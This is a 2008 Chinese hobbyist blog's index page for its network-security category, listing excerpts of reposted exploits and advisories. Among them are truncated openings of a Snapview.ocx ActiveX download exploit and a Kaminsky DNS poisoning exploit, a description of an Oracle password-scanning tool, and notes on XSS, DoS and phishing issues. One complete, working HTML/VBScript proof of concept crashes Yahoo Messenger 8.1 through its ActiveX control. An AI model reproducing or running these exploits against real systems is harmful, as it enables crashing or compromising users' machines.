rosicky311(小浩）[HACKBASE]_博客

文章列表

您正在查看 "网络安全" 分类下的文章

Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

2008-07-25 18:14

/* Microsoft Access Snapshot Viewer ActiveX Control Exploit
   Ms-Acees SnapShot Exploit Snapview.ocx v 10.0.5529.0
   Download nice binaries into an arbitrary box
   Vulnerability discovered by Oliver Lavery 
   http://www.securityfocus.com/bid/8536/info
   Remote: Yes
   greetz to str0ke */

#include <stdio.h>
#include <stdlib.h>

#define Filename        "Ms-Access-SnapShot.html"

FILE *File;
char data[] = "<html>\n<objectclassid='clsid:F0E42D50

阅读全文>>

类别：网络安全 | 评论(1) | 浏览()

DNS攻击代码已经公布

2008-07-24 15:49

Kaminsky DNS Cache Poisoning Flaw Exploit

/ \ / \ | | | |
----====####/ /\__\##/ /\ \##| |##| |####====----
| | | |__| | | | | |
| | ___ | __ | | | | |
------======######\ \/ /#| |##| |#| |##| |######======------
\____/ |__| |__| \______/

Computer Academic Underground
http://www.caughq.org
Exploit Code

===============/===================================

阅读全文>>

类别：网络安全 | 评论(0) | 浏览()

python写的oracle数据库密码扫描工具

2008-07-24 15:44

闲来无事，写个小工具。扫oracle密码。
水平有限，对python没有深究，甚至在写工具的时候连"or"这种条件语句都不会。
所以大家将就下。。。
-----------------------oracle's password,user scan
-----------------------code by kxlzx
-----------------------voidloafer@gmail.com
-----------------------http://www.inbreak.net
dbname.ini --- database name
pass.ini --- passwords
user.ini --- users

阅读全文>>

类别：网络安全 | 评论(0) | 浏览()

《连线》:DNS 漏洞细节被泄露,攻击即将开始

2008-07-23 15:34

尽管 Dan Kaminsky 努力掩盖他所发现的 DNS 严重漏洞的细节，Matasano 安全公司的一个员工还是在他的博客上泄露了这些资料，虽然文章被立即删除，但已经有人拿到了这些资料，并发表在别的地方。Kaminsky 在他的博客上发表了一个

阅读全文>>

类别：网络安全 | 评论(0) | 浏览()

Z-blog FUNCTION/c_function.asp跨站脚本攻击漏洞

2008-07-21 22:25

来源：80 sec
漏洞说明：Z-Blog是一款基于Asp平台的Blog博客(网志)程序，支持Wap，支持Firefox，Oprea等浏览器，在国内使用非常广泛，官方主页在http://www.rainbowsoft.org/。Z-blog代码严谨，前台功能简洁，后台功能强大，这为它的

阅读全文>>

类别：网络安全 | 评论(2) | 浏览()

警惕GMail钓鱼邮件！

2008-07-21 17:18

转自http://www.awflasher.com/blog/

今天，Feedsky的帅哥Src给我Forward了一封E-mail，询问这封邮件的真假。我打开一看，邮件中自称来自“GMail小组”，样式也采用了Google的一贯风格，还真是有点“以假乱真”的模样。

邮件全文如下：

---------- Forwarded message ----------
From: Gmail 小组 <mail-noreply@gmail.com>
Date: 2008/7/16
Subject:

阅读全文>>

类别：网络安全 | 评论(0) | 浏览()

【转】暴风影音2008Beta1 最新远程溢出 0day 分析

2008-07-19 16:23

dummy@ph4nt0m.org
原文地址：http://hi.baidu.com/dummy24/blog/item/dfc576dc2768b3a7cc116603.html

已近将此漏洞报给暴风.

声明：纯技术研究，禁止将本文

阅读全文>>

类别：网络安全 | 评论(1) | 浏览()

BitComet URI处理拒绝服务漏洞

2008-07-18 17:50

影响版本:

BitComet 1.02

描述:

BUGTRAQ ID: 30255
CNCAN ID：CNCAN-2008071703

BitComet是一款免费的BitTorrent(BT)下载管理软件。
BitComet处理超长URL存在缓冲区溢出，远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。
构建包含超长URL的恶意文件，诱使用户使用bitcomet作为批处理下载，可导致应用程序崩溃。

<* 参考

阅读全文>>

类别：网络安全 | 评论(0) | 浏览()

Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit

2008-07-16 13:01

转自：SEBUG

Yahoo Messenger 8.1 (latest) Remote DoS
Safe for Scripting, Safe for Initialize

<html><body>

<object id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670></object>
<script language=vbscript>

arg1=String(517140, "A")
target.c arg1

</script>
</body></html>

PS：这个IM软件我断断续续的安过几次~总体感觉挺清新 不过用的人少~哎~前几天刚装的 就又爆了漏洞~

类别：网络安全 | 评论(0) | 浏览()

Microsoft Office Snapshot Viewer ActiveX Exploit (可执行版)

2008-07-15 01:56

转自：tr4c3

From: http://www.blogjava.net/baicker/archive/2008/07/14/214835.html

lcx给的，网上的都是放启动项，这个可以自动执行

<script type="text/javascript"

阅读全文>>

类别：网络安全 | 评论(0) | 浏览()

[首页] 1 [2] [3] [4] [5] [6] [7] [8] [9] [10] [下一页] [尾页]

文章分类

默认分类(27)

qq黑客(36)

无聊日记(108)

暴笑网文(31)

网络安全(234)

金融乱侃(47)

电子竞技(22)

文章存档